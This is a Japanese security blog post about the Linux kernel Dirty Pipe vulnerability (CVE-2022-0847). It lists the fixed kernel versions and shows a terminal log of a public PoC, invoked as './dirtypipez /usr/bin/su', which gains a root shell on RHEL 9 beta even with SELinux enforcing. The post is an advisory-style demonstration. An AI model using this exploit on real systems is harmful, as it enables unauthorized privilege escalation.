Linux Kernelの脆弱性(Important: CVE-2022-0847 (Dirty Pipe))とPoC(RHEL9beta+SELinux)

こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。

03/08/2022にLinux Kernelの脆弱性(Important: CVE-2022-0847 (Dirty Pipe))が公開されました。「Dirty Cowと同じような脆弱性」ということで、「Dirty Pipe」と名前が付けられており、既にPoCも公開されていることからインパクトも大きいと思われます (5.16.11, 5.15.25, 5.10.102で修正されており、ローカルユーザによる攻撃が必要なのでパニックにならないでください)。

今回もまた昨日早朝に上げた元記事がGoogle八分になっているので、こちらにもPoCの情報と元記事へのリンクを公開します。



PoC動画

PoCの環境にはSELinuxを有効にしたRed Hat Enterprise Linux 9betaを使っています。本脆弱性の性質上、SELinuxによるアクセス制限はかかりません。

Dirty Pipe (CVE-2022-0847) PoC on Red Hat Enterprise Linux 9beta (SELinux Enabled)

PoC

やはりSELinuxを有効にしたRed Hat Enterprise Linux 9-betaでPoCコードを動かすと、SELinuxが有効になっていても特権を取得されてしまいます。


[sios@rhel9b CVE-2022-0847]$ getenforce
Enforcing
[sios@rhel9b CVE-2022-0847]$ ./dirtypipez /usr/bin/su
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
sh-5.1# id -Z
unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-5.1# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(sios) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
タイトルとURLをコピーしました